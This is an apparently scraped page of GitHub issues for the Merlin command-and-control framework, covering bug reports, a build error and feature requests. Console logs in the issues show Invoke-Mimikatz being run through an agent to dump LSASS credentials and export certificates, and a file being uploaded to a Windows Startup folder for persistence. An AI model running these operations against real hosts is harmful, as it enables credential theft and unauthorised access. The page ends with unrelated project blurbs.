I know I can import the working module manually but my suggestion is if it's going to be tracked from an external source anyways, might as well track a repo that gets updated frequently (eg, Empire https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1).
Merlin» agent list
+--------------------------------------+---------------+-----------------------+-----------------+-------------+--------+
| AGENT GUID | PLATFORM | USER | HOST | TRANSPORT | STATUS |
+--------------------------------------+---------------+-----------------------+-----------------+-------------+--------+
| 5adafe61-0827-49cc-a56b-fb83e1c4e803 | windows/amd64 | WIN-F7I54C7428A\mahdi | WIN-F7I54C7428A | HTTP/2 (h2) | Active |
| ffba5858-9d51-4e2b-8747-cc54b7c0360d | linux/amd64 | mahdi | ubuntu | HTTP/2 (h2) | Active |
+--------------------------------------+---------------+-----------------------+-----------------+-------------+--------+
Merlin» use module windows/x64/powershell/powersploit/Invoke-Mimikatz
Merlin[module][Invoke-Mimikatz]» show options
Agent: 00000000-0000-0000-0000-000000000000
Module options(Invoke-Mimikatz)
NAME | VALUE | REQUIRED | DESCRIPTION
+--------------+--------------------------------------+----------+--------------------------------+
Agent | 00000000-0000-0000-0000-000000000000 | true | Agent on which to run module
| | | Invoke-Mimikatz
DumpCreds | true | false | [Switch]Use mimikatz to dump
| | | credentials out of LSASS.
DumpCerts | | false | [Switch]Use mimikatz to export
| | | all private certificates
| | | (even if they are marked
| | | non-exportable).
Command | | false | Supply mimikatz a custom
| | | command line. This works
| | | exactly the same as running
| | | the mimikatz executable
| | | like this: mimikatz
| | | "privilege::debug exit" as an
| | | example.
ComputerName | | false | Optional, an array of
| | | computernames to run the
| | | script on.
Merlin[module][Invoke-Mimikatz]» set Agent 5adafe61-0827-49cc-a56b-fb83e1c4e803
[+]agent set to 5adafe61-0827-49cc-a56b-fb83e1c4e803
Merlin[module][Invoke-Mimikatz]» show options
Agent: 5adafe61-0827-49cc-a56b-fb83e1c4e803
Module options(Invoke-Mimikatz)
NAME | VALUE | REQUIRED | DESCRIPTION
+--------------+--------------------------------------+----------+--------------------------------+
Agent | 5adafe61-0827-49cc-a56b-fb83e1c4e803 | true | Agent on which to run module
| | | Invoke-Mimikatz
DumpCreds | true | false | [Switch]Use mimikatz to dump
| | | credentials out of LSASS.
DumpCerts | | false | [Switch]Use mimikatz to export
| | | all private certificates
| | | (even if they are marked
| | | non-exportable).
Command | | false | Supply mimikatz a custom
| | | command line. This works
| | | exactly the same as running
| | | the mimikatz executable
| | | like this: mimikatz
| | | "privilege::debug exit" as an
| | | example.
ComputerName | | false | Optional, an array of
| | | computernames to run the
| | | script on.
Merlin[module][Invoke-Mimikatz]» run
[-]Created job GgVSoTEoZE for agent 5adafe61-0827-49cc-a56b-fb83e1c4e803 at 2019-04-17T05:11:22Z
Merlin[module][Invoke-Mimikatz]» [!]There was an error during an Agent StatusCheckIn:
invalid job type, sending ServerOK
please help me
using a hash table to map from alias string to uuid in server local storage.
Upload a file from Server to Agent (Filepath includes spaces!)
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]»
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]» upload pwnd.png C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows*Start Menu*\Programs\Startup\pwnd.png
[-]Created job xjMiCcHfxU for agent ad27de92-39fe-4b6f-b061-6ebb7a8e7365
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]» [+]Results for job xjMiCcHfxU
[+]Successfully uploaded file to C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start on agent ad27de92-39fe-4b6f-b061-6ebb7a8e7365
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]»
Merlin is just using the path "C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start"
Quotation marks are also not working:
upload pwnd.png "C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwnd.png"
[-]Created job QdCJkcbzmt for agent ad27de92-39fe-4b6f-b061-6ebb7a8e7365
Merlin[agent][ad27de92-39fe-4b6f-b061-6ebb7a8e7365]» [+]Results for job QdCJkcbzmt
[!]There was an error getting the FileInfo structure for the remote directory "C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows\Start:
CreateFile "C:\Users\Win10PC\AppData\Roaming\Microsoft\Windows: Die Syntax für den Dateinamen, Verzeichnisnamen oder die Datenträgerbezeichnung ist falsch.
Just upload a file to a location with paces in the path.
at https://github.com/Ne0nd0g/merlin/wiki/Building-or-Running-from-Source
the instructions have a small error, it says use the flag main.URL but it needs to be main.url in lowercase
compiling DLL from source
frank@ubuntu:~/merlin/data/bin/dll$ go build -buildmode=c-archive ../../../cmd/merlinagentdll/main.go
../../../cmd/merlinagentdll/main.go:28:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/agent" in any of:
/usr/local/go/src/github.com/Ne0nd0g/merlin/pkg/agent (from $GOROOT)
/home/frank/merlin/src/github.com/Ne0nd0g/merlin/pkg/agent (from $GOPATH)
There is no src/github.com/Ne0nd0g directory in the repository?
Add a command to Merlin Server to prompt user to verify when using the exit
command. This will prevent a user from accidentally shutting down the server by providing a validation check.
Add the ability to issue a jobs
command and see all jobs per agent along with their status. Some status could include:
created
- This is when the job has been entered into the server but not sent to the agentsent
- This is when the job has been sent to the agent from the server0.6.6.BETA
nonRelease
1.11.2
Ubuntu
Show agent information
panic: runtime error: invalid memory address or nil pointer dereference
Instruct an agent to exit by issuing the kill
command from the agent menu. Immediately try to interact with that again after it has been removed by issuing the info
command.
Merlin» sessions
+--------------------------------------+-------------+------+--------+-------------+--------+
| AGENT GUID | PLATFORM | USER | HOST | TRANSPORT | STATUS |
+--------------------------------------+-------------+------+--------+-------------+--------+
| 8caa6f6c-0a56-466e-acfc-519d487fb2fe | linux/amd64 | tim | ABC001 | HTTP/2 (h2) | Active |
+--------------------------------------+-------------+------+--------+-------------+--------+
Merlin» interact 8caa6f6c-0a56-466e-acfc-519d487fb2fe
Merlin[agent][8caa6f6c-0a56-466e-acfc-519d487fb2fe]» [i]Agent 8caa6f6c-0a56-466e-acfc-519d487fb2fe was removed from the server
Merlin[agent][8caa6f6c-0a56-466e-acfc-519d487fb2fe]» info
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0xe0 pc=0x5944ba]
goroutine 20 [running]:
github.com/Ne0nd0g/merlin/pkg/agents.GetAgentStatus(0x6e46560a6c6faa8c, 0xfeb27f489d51fcac, 0xc000079800, 0x43455c)
/home/tim/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:549 +0x6a
github.com/Ne0nd0g/merlin/pkg/agents.ShowInfo(0x6e46560a6c6faa8c, 0xfeb27f489d51fcac)
/home/tim/go/src/github.com/Ne0nd0g/merlin/pkg/agents/agents.go:291 +0x77
github.com/Ne0nd0g/merlin/pkg/cli.Shell()
/home/tim/go/src/github.com/Ne0nd0g/merlin/pkg/cli/cli.go:363 +0x1617
created by main.main
/home/tim/go/src/github.com/Ne0nd0g/merlin/cmd/merlinserver/main.go:67 +0x481
exit status 2
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.